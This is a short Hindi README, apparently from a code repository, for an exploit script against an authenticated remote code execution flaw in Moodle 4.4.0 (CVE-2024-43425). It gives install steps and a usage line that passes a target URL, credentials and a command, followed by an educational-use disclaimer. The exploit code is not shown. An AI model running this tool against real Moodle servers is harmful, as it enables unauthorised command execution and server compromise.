
🚀 Moodle 4.4.0 प्रमाणित RCE (CVE-2024-43425) के लिए एक्सप्लॉइट — कमांड को दूरस्थ रूप से चलाएँ ⚡
CVE: CVE-2024-43425
यह शोषण ऊपर सूचीबद्ध Moodle संस्करणों में एक प्रमाणित रिमोट कोड निष्पादन (RCE) भेद्यता को लक्षित करता है। यह एक हमलावर को मान्य क्रेडेंशियल्स के साथ असुरक्षित प्रश्न बैंक संपादन कार्यक्षमता का शोषण करके सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देता है।
pip install -r requirements.txt
python exploit.py --url http://target_moodle_url --username your_username --password your_password --cmd "whoami"

यह शोषण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।